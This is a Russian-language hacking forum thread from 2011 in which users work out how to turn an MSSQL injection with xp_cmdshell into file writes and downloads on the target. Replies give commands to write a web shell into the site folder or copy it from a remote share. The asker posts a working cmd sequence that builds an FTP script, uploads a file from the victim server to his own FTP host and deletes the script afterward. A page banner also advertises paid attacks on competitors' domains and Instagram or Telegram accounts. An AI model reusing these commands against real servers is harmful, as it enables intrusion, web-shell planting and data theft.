УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Загрузка файла через MSSQL INJ

Опции темы

Поиск в этой теме

Опции просмотра

25.12.2011, 19:04

jangle

Познающий

Регистрация: 19.11.2006

Сообщений: 32

Провел на форуме:
95879

Репутация: 5

Отправить сообщение для jangle с помощью ICQ

Доброго времени суток, уважаемые.

Подскажите, есть ли возможность через CMD скачать файл с интернета и сохранить его локально. Т.е. задача такова: имея MSSQL injection и возможность воспользоваться

Цитата:

Сообщение от None

;exec+master..xp_cmdshell+'bla bla bla';--

вместо bla bla bla использовать команду тоторая скачала бы шелл с моего сервера и сохранила в указанное место на уязвимый сервер.

Спасибо за ответы

25.12.2011, 19:32

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

jangle

про закачку файлов ничего сказать не могу, но есть вариант записать данные в файл, это поможет залить хоть форму загрузки файлов

cmd> echo "тут твой текст" > C:\папка_в_htdocs_\твойфайл

как и в никсах..

25.12.2011, 20:41

jangle

Познающий

Регистрация: 19.11.2006

Сообщений: 32

Провел на форуме:
95879

Репутация: 5

как вариант.

НО ...

к сожалению при повторном выполнении команды текст переписывается, а для записи в файл формы нужно будет сделать несколько строк, т.к. SQL INJ не позволяет в моем данном случае вписать длинный текст, кроме того фильтрация некоторых символов которые используются в том же html все таки есть.

к стати, для того что бы строки добавлялись в файл а не переписывались можно использовать

Цитата:

Сообщение от None

cmd> echo "тут твой текст"
>>
C:\папка_в_htdocs_\твойфайл

В общем, буду экспериментировать и ОГРОМНЕШЕЕ СПАСИБО за наводочку - буду думать)

25.12.2011, 20:43

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

Провел на форуме:
4512

Репутация: 0

copy \\123.123.123.123\my_shared_dir\filename.txt c:\site\shell.php

26.12.2011, 07:27

jangle

Познающий

Регистрация: 19.11.2006

Сообщений: 32

Провел на форуме:
95879

Репутация: 5

Цитата:

Сообщение от M_script

M_script said:
copy \\123.123.123.123\my_shared_dir\filename.txt c:\site\shell.php

Этот способ не подходит т.к. копировать можно с рашаренного IP по NetBIOS

С сайта же нет возможности (если я не ошибаюсь)

Пробую локально

Цитата:

Сообщение от None

copy \\my_site.ru\abc.html.php c:\shell.php

Пишет

Цитата:

Сообщение от None

Отказано в доступе.

26.12.2011, 08:10

jangle

Познающий

Регистрация: 19.11.2006

Сообщений: 32

Провел на форуме:
95879

Репутация: 5

Этот способ я пробовал, но что- то не так. Не получилось

Реализовал примерно так (может кому надо будет. Тут заливка C:\1.txt с уязвимого сервера на мой FTP)

Цитата:

Сообщение от None

echo+off
echo+open+ftp.site.com>>c:\asd.txt
echo+ftp_user>>c:\asd.txt
echo+ftp_password>>c:\asd.txt
echo+mput+C:\1.txt>>c:\asd.txt
echo+quit>>c:\asd.txt
ftp+-i+-s:c:\asd.txt
del+/Q+/F+c:\asd.txt
tskill+CMD

Вообщем, направление понятно

Konqi, M_script, Nightmarе - БЛАГОДАРЮ!

Тема закрыта

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход